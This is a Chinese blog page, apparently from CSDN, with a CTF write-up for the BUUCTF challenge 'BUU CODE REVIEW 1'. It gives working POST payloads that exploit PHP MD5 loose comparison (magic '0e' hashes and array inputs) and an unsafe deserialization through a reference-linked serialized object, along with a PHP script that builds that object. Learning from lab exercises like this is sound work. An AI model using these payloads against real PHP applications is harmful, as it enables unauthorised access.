BUU CODE REVIEW 1 1

最新推荐文章于 2025-07-28 13:02:57 发布

原创最新推荐文章于 2025-07-28 13:02:57 发布 · 2.3k 阅读

1 ·

CC 4.0 BY-SA版权

文章标签：

#apache #php #web安全

BUUCTF 专栏收录该内容

131 篇文章

订阅专栏

本文介绍了两种通过MD5特性实现地址传值的方法。利用MD5的特定输出和无法加密数组的特点，实现弱类型比较下的相等，从而完成特殊场景下的数据传递需求。文章通过PHP示例代码展示了这一技巧的具体实现。

知识点：地址传值

在这里插入图片描述
法1：

GET:?pleaseget=1

POST:pleasepost=2&md51=QNKCDZO&md52=240610708&obj=O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}

原理：QNKCDZO和240610708MD5一下为0e开头，又是弱等于，0的n次方还是0
法2：

GET:?pleaseget=1

POST:pleasepost=2&md51[]=1&md52[]=2&obj=O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}

原理：MD5无法加密数组，返回null所以相等

<?php
class BUU {
   public $correct = "";
   public $input ="";
}

$a = new BUU();
$a->input=&$a->correct;//把地址赋值过去，地址相同，值肯定也相同。
echo serialize($a);
?>

在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

succ3

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

【BUUCTF】basic web BUU CODE REVIEW 1 1（反序列化漏洞，传引用判断相等）

weixin_45844670的博客

10-12

3585

<?php /** * Created by PhpStorm. * User: jinzhao * Date: 2019/10/6 * Time: 8:04 PM */ highlight_file(__FILE__); class BUU { public $correct = ""; public $input = ""; public function __destruct() { try { $this->corre

BUUCTF/BUU CODE REVIEW 1

weixin_44041994的博客

03-20

1721

2.判断GET参数pleaseget的值是否为1，POST参数pleasepost的值是否为2，参数md51和md52的值是否不等，经过md5加密后的参数md51和md52的值是否相等，这四个条件同时满足的话，对POST参数obj进行反序列化，而对象被反序列化时会调用__destruct方法。序列化的定义是：在计算机科学的数据处理中，是指将数据结构或对象状态转换成可取用格式(例如存成文件，存于缓冲，或经由网络中发送)以留待后续在相同或另一台计算机环境中，能恢复原先状态的过程。最后是进行反序列化的obj。

参与评论您还未登录，请先登录后发表或查看评论

【CTF练习】BUU CODE REVIEW 1（代码审计）

m0_73866435的博客

01-31

2708

大致流程第一个if满足进入的条件为第二个if满足条件为。第三个if满足条件为。如果 1、2、3 条件都满足之后就会执行反序列化，通过POST 传参obj 执行，然后进入类函数类函数也有一个if满足条件为。但是correct 却是利用一个时间进行计算的值的base64 值。那么为什么执行反序列化就会自动进行类函数执行呢，我们来了解一下魔术方法。

BUU CODE REVIEW 1

as you know, nlp is fantasitc!

04-17

3340

写在前面：这道题传引用的知识点，让我意识到php机制的一些不同，php有着自己的语言特性一篇详细介绍php引用特性的文章 <?php highlight_file(__FILE__); class BUU { public $correct = ""; public $input = ""; public function __destruct() { try { $this->correct = base64_encode(uniq

BUU CODE REVIEW 1-[传送门-＞BUUCTF]

qwsn

11-23

8322

0x01、Web 1.BUU CODE REVIEW 1-[传送门->BUUCTF] 第一步：打开题目环境，点击链接，进行代码审计 <?php /** * Created by PhpStorm. * User: jinzhao * Date: 2019/10/6 * Time: 8:04 PM */ highlight_file(__FILE__); //高亮显示当前页面源码 class BUU { //类：BUU public $correct = "";

BUU CODE REVIEW 11 代码审计之反序列化知识

weixin_42515203的博客

06-19

746

BUU CODE REVIEW 11 代码审计之反序列化知识

BUUCTF——BUU CODE REVIEW 1

最新发布

2301_78190890的博客

07-28

530

的执行，那就需要保证上面的$this->corrent === $this->input判断通过，但是这整个模块是处于__destruct() 里，就需要通过。，后面接的"2"是指第二个字符串，也就是corrent的值。这样就保证inpt的值和corrent的值相同，能够顺利通过判断了，成功获取到了flag。其中第一个为字符串类型，即"s"，后面的则相同，在后面一个"s"是指该变量的值的类型，长度为0，内容为空。看题目名称，是需要进行代码审计的，果然，打开网站就直接是源码，那就开始分析。

常见的MD5碰撞

aeymp589524的博客

10-31

549

md5值为0e开头 0e开头的md5和原值： QNKCDZO 0e830400451993494058024219903391 s878926199a 0e545993274517709034328855841020 s155964671a 0e342768416822451524974117254469 s214587387a 0e848240448830537924465865611...

BUU CODE REVIEW

m2a3181的博客

07-20

485

BUU CODE REVIEW 题目是简单的代码审计 <?php /** * Created by PhpStorm. * User: jinzhao * Date: 2019/10/6 * Time: 8:04 PM */ highlight_file(__FILE__); class BUU { public $correct = ""; public $input = ""; public function __destruct() { try

Code Review（一）

Keep Calm and Carry On.

08-10

1179

1. 尽可能减少return的次数，同时避免不必要的重复逻辑处理如 public boolean isWIFIOpened() { if (mWifiManager.isWifiEnabled()){ returntrue; }else{ returnfalse; }

【Basic】BUU CODE REVIEW

欢迎来到我的学习笔记薄

05-21

1148

写的非常详细，这道题比起前面几道有点难理解，建议反复观看。

反序列号漏洞学习！BUUCTF 极客PHP BUU CODE REVIEW 1 [网鼎杯 2020 青龙组]AreUSerialz

qq_58869808的博客

07-26

1918

反序列号漏洞学习！BUUCTF 极客PHP BUU CODE REVIEW 1 [网鼎杯 2020 青龙组]AreUSerialz

BUUCTF刷题笔记—CODE REVIEW 1（使用Hacker google/Edge扩展器）

qq_43176656的博客

08-24

1797

BUUCTF CODE REVIEW Hacker

BUUCTF Basic 解题记录--BUU CODE REVIEW 1

weixin_43171033的博客

09-28

535

【代码】BUUCTF Basic 解题记录--BUU CODE REVIEW 1。

BUU CODE REVIEW 1 1使用burps

06-18

### BUU CODE REVIEW 第一关使用 Burp Suite 解题方法 BUU平台的代码审查挑战通常涉及Web安全测试技术，例如使用Burp Suite工具进行漏洞挖掘和数据包分析。以下是关于BUU CODE REVIEW第一关的解决方案及Burp Suite...